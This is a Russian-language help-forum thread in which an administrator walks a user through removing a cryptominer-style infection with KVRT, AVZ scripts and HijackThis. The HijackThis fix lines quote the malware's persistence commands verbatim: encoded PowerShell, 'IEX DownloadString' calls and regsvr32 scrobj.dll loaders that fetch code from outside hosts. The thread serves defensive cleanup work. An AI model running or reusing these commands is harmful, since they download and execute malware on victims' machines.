• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена mysa,mysa1,mysa2,mysa3,ok

Статус
В этой теме нельзя размещать новые ответы.

debufff

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
Появились задания Mysa,Mysa1,Mysa2,Mysa3,ok в планировщике заданий когда удаляю появляются опять. Браузер при запуске открывает страницу about:blank хотя стоит новая вкладка. Сеть иногда просто пропадает. И при запуске пк через 2 минуты появляется на пол секунды cmd которая сворачивает приложения.
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,521
Баллы
2,203
1. Скачайте утилиту на рабочий стол.
2. Запустите KVRT и подтвердите согласие с условиями использования
3. Дождитесь завершения инициализации и в открывшемся окне нажмите на кнопку "Изменить параметры"
4. В открывшемся меню, поставьте галочку напротив "Системный раздел" и нажмите "Ок"
5. Нажмите кнопку "Начать проверку" для начала сканирования и пролечите все найденое.
6. Дождитесь завершения сканирования и зайдите в папку C:\KVRT_Data\ (C:\ это обычно раздел, где установлена работающая версия Windows) и упакуйте папку Reports в архив и прикрепите к теме

А после нужны логи https://safezone.cc/pravila/
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,521
Баллы
2,203
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','');
 QuarantineFile('c:\windows\update.exe>','');
 QuarantineFile('c:\windows\debug\item.dat','');
 QuarantineFile('c:\windows\debug\item.dat>','');
 QuarantineFile('c:\windows\help\lsmosee.exe>','');
 QuarantineFile('c:\windows\debug\ok.dat','');
 QuarantineFile('C:\Users\Серго\AppData\Roaming\nssm.exe','');
 DeleteFile('C:\Users\Серго\AppData\Roaming\nssm.exe','32');
 DeleteFile('c:\windows\debug\ok.dat','32');
 DeleteFile('c:\windows\help\lsmosee.exe>','32');
 DeleteFile('c:\windows\debug\item.dat>','32');
 DeleteFile('c:\windows\debug\item.dat','32');
 DeleteFile('c:\windows\update.exe>','32');
 DeleteFile('C:\Users\Серго\AppData\Local\Pupdbrowser\Pupdbrowser.exe','32');
 DeleteSchedulerTask('Pupdbrowser');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','x32');
 DeleteSchedulerTask('Mysa');
 DeleteSchedulerTask('Mysa1');
 DeleteSchedulerTask('Mysa2');
 DeleteSchedulerTask('Mysa3');
 DeleteSchedulerTask('ok');
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.
Компьютер перезагрузится.

После перезагрузки, выполните такой скрипт:

Код:
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 10 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O25 - WMI Event: fuckyoumm4 - fuckyoumm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'",  cmd /c powershell.exe -nop -enc "JAB3AGMAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdwBtAGkALgAxADIAMQA3AGIAeQBlAC4AaABvAHMAdAAvADIALgB0AHgAdAAnACkALgB0AHIAaQBtACgAKQAgAC0AcwBwAGwAaQB0ACAAJwBbAFwAcgBcAG4AXQArACcAfAAlAHsAJABuAD0AJABfAC4AcwBwAGwAaQB0ACgAJwAvACcAKQBbAC0AMQBdADsAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAXwAsACAAJABuACkAOwBzAHQAYQByAHQAIAAkAG4AOwB9AA=="&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1217bye.host/S.ps1')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://173.208.139.170/s.txt')&powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://35.182.171.137/s.jpg')||regsvr32 /u /s /i:http://wmi.1217bye.host/1.txt scrobj.dll&regsvr32 /u /s /i:http://173.208.139.170/2.txt scrobj.dll&regsvr32 /u /s /i:http://35.182.171.137/3.txt scrobj.dll
Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
ошибка какая-тоСнимок.PNG
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,521
Баллы
2,203
Используйте AVZ из папки автологера, а не устаревшую версию 4.46
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
2019.10.17_quarantine_6736e374275c905c15846238569e4c23.7z
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,521
Баллы
2,203
"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O4 - MSConfig\startupreg: start [command] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.0603bye.info:280/v.sct scrobj.dll (HKLM) (2019/10/03)
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)

Что с проблемой после фикса?
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
Вроде все нормально, спасибо за помощь
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,521
Баллы
2,203
Исправьте по возможности
Системный диск: C: ФС: [NTFS] Емкость: [37.3 Гб] Занято: [25.6 Гб] Свободно: [11.7 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 8.0.7601.17514 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Контроль учётных записей пользователя отключен (Уровень 1)
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3020369 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4474419 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4484071 Внимание! Скачать обновления
HotFix KB4512486 Внимание! Скачать обновления
HotFix KB4519976 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
Microsoft .NET Framework 4.5.2 v.4.5.51209 Внимание! Скачать обновления
 

debufff

Новый пользователь
Сообщения
8
Реакции
0
Баллы
1
Файл подкачки минимум какой выставить на диске С?
 

akok

Команда форума
Администратор
Сообщения
17,781
Реакции
13,521
Баллы
2,203
Оставьте размер по выбору системы, будет лучше.
 
Статус
В этой теме нельзя размещать новые ответы.

Similar Threads

Ответы
14
Просмотры
366
Ответы
9
Просмотры
2K
Ответы
11
Просмотры
546
Ответы
18
Просмотры
1K
Сверху Снизу